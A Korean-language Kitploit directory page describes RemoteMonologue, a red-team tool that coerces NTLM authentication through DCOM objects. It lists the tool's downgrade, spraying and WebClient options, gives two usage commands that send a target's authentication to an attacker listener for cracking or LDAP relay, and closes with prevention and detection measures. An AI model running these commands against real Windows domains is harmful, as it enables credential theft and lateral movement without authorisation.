Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/3lp4tr0n/remotemonologue
ReconnaissancePassword AttacksExploitationLateral MovementPost-ExploitationPenetration TestingAuthenticationRed TeamingAdversarial Attack
GitHub3lp4tr0n/remotemonologue

RemoteMonologue

NTLM 인증 강제를 위한 DCOM 무기화

215429개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
RemoteMonologue — NTLM 인증 강제를 위한 DCOM 무기화 | Kitploit
저장소 보기

RemoteMonologue

RemoteMonologue는 Interactive User RunAs 키를 활용하고 DCOM을 통해 NTLM 인증을 강제하여 원격 사용자를 손상시킬 수 있는 Windows 자격 증명 수집 기법입니다.

자세한 정보는 X-Force Red의 RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions에서 확인하십시오.

기능

🔹 DCOM을 통한 인증 강제 (-dcom)

  • 네 개의 DCOM 개체(ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession)를 대상으로 지정된 리스너(-auth-to)에 대한 NTLM 인증을 트리거합니다.

🔹 자격 증명 스프레이 (-spray)

  • 사용자 자격 증명을 캡처하면서 여러 시스템에서 자격 증명을 검증합니다.

🔹 NetNTLMv1 다운그레이드 공격 (-downgrade)

  • 대상이 NTLMv1을 사용하도록 강제하여 자격 증명 크래킹과 릴레이를 더 쉽게 만듭니다.

🔹 WebClient 서비스 남용 (-webclient)

  • WebClient 서비스를 활성화하여 HTTP 기반 인증 강제를 용이하게 합니다.

🔹 사용자 열거 (-query)

  • 대상 시스템에서 활성 세션이 있는 사용자를 식별합니다.

참고: 대상 시스템에 대한 로컬 관리자 권한이 필요합니다.

설정

root@kitploit:~
pip install impacket

사용 예시

다음은 Responder를 리스너로 사용하면서 NetNTLMv1 다운그레이드 공격으로 RemoteMonologue를 실행하는 예시입니다. 기본적으로 DCOM 옵션이 지정되지 않으면 도구는 ServerDataCollectorSet DCOM 개체를 사용합니다.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

다음은 또 다른 예시로, 이번에는 FileSystemImage DCOM 개체를 사용하여 공격을 실행하고 WebClient 서비스를 활성화하여 HTTP 인증을 획득한 다음 ntlmrelayx를 사용하여 LDAP으로 릴레이합니다.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

방어 고려 사항

이러한 기법으로부터 보호하고 탐지하기 위해 구현할 수 있는 몇 가지 예방 및 탐지 조치가 있습니다.

예방 조치:

  1. LDAP 서명 및 채널 바인딩 활성화: 릴레이 공격으로부터 LDAP 엔드포인트를 보호하기 위해 도메인 컨트롤러에서 LDAP 서명 적용과 채널 바인딩을 구성합니다. 참고: 이러한 설정은 Windows Server 2025부터 기본적으로 적용됩니다.

  2. 최신 Windows 버전으로 업그레이드: NTLMv1이 제거된 Windows Server 2025 및 Windows 11 버전 24H2로 서버와 워크스테이션을 업그레이드하여 NetNTLM 다운그레이드 공격을 완화합니다.

  3. SMB 서명 적용: SMB 릴레이 공격을 방지하기 위해 Windows 서버에서 SMB 서명을 활성화하고 적용합니다.

  4. 강력한 암호 정책 구현: 강력한 암호 요구 사항을 적용하여 암호 크래킹 공격을 더 어렵게 만듭니다.

탐지 기회:

  1. DCOM 개체에 대한 원격 액세스 모니터링: 영향을 받는 DCOM 개체와 해당 특정 속성 및 메서드에 대한 액세스를 추적하여 비정상적인 활동을 식별합니다.

  2. 레지스트리 수정 모니터링: RunAs 및 LmCompatibilityLevel 레지스트리 키의 변경 사항을 모니터링합니다.

  3. WebClient 서비스 활동 추적: HTTP 기반 NTLM 인증을 용이하게 하는 데 사용되므로 WebClient 서비스가 원격으로 활성화되는 인스턴스를 모니터링합니다.

도구 다운로드